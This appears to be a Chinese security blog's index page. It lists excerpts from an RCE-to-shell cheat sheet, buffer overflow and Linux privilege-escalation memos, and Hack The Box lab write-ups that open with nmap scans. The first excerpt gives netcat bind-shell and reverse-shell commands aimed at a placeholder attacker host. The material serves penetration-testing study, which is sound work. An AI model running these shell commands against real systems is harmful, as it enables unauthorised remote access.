从RCE到Shell 在有限的解释器中获取shell： $ system("start cmd.exe /k $cmd") 将cmd绑定到端口： $ nc.exe -Lp 31337 -vv -e cmd.exe Reverse shell: $ nc.exe attacker_ip attacker_port -e cmd.exe 0：系统信息 查找已安装的软件

简介 这是一个缓冲区溢出 的备忘录，涵盖了常用姿势。 身份识别 第一步是识别漏洞。您可以调试该应用并使用较大的字符串对其进行模糊处理，并确定导致崩溃

简介 这是一个Linux 提取的备忘录，涵盖了大部分常用姿势，本文为原创作品。 获得shell后 获得交互 Shell 1 $ python -c 'import pty;pty.spawn("/bin/bash")' 如果失败可设置PATH TER

环境介绍： 名称：Bounty 系统：Windows 信息搜集 获取目标 1 2 3 4 5 6 7 8 9 10 11 12 13 14 $ nmap -A 10.10.10.93 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-30 10:20 CST Nmap scan report for 10.10.10.93 Host is up (0.34s latency).

环境介绍： 名称：Blue 系统：Windows 信息搜集 获取目标 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 $ nmap -A 10.10.10.40 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-29 15:22 CST Nmap scan report for 10.10.10.40 Host is up (0.34s

环境介绍： 名称：Granny 系统：Windows 信息搜集 获取目标 1 2 3 4 5 6 7 8 9 10 11 12 13 14 $ nmap -sV -O -F -oA Granny --version-light 10.10.10.15 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-29 14:01 CST Nmap scan report for 10.10.10.15

环境介绍： 名称：Grandpa 系统：Windows 信息搜集 获取目标 1 2 3 4 5 6 7 8 9 10 $ nmap -sV -O -F -oA Grandpa --version-light 10.10.10.14 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-29 09:19 CST Nmap scan report for 10.10.10.14 Host is up

环境介绍： 名称：Arctic 系统：Windows 信息搜集 获取目标 1 2 3 4 5 6 7 8 9 10 11 12 13 $ nmap -A 10.10.10.11 Starting Nmap 7.80 ( https://nmap.org ) at Nmap scan report for 10.10.10.11 Host is up (0.33s latency). Not shown: 997 filtered

环境介绍： 名称：Devel 信息搜集 获取目标 1 2 3 4 5 6 $ nmap -sV -O -F -oA Legacy --version-light 10.10.10.5 Nmap scan report for 10.10.10.5 PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 80/tcp open http Microsoft IIS httpd 7.5 Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008

环境介绍： 名称：Bastard 系统：Windows 信息搜集 1 2 3 4 5 6 $ sudo nmap -sV -O -F --version-light 10.10.10.9 PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open unknown -sV：探测开

环境介绍： 名称：Devel 系统：Windows 信息搜集 1 $ sudo nmap -sV -O -F --version-light 10.10.10.8 -sV：探测开放端口以确定服务/版本信息 -O：启用OS检测 -F：快速

环境介绍： 名称：Legacy 系统：Windows 信息搜集 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 $ sudo nmap -sV -O -F --version-light 10.10.10.4 Starting Nmap 7.80 ( https://nmap.org ) at 2 Nmap scan report for 10.10.10.4 Host is up

环境介绍： 名称：SickOs: 1.2 日期：2016年5月27日 作者：D4rk 系列：SickOs 说明： 这是来自SickOs的以下系列中的第二个并且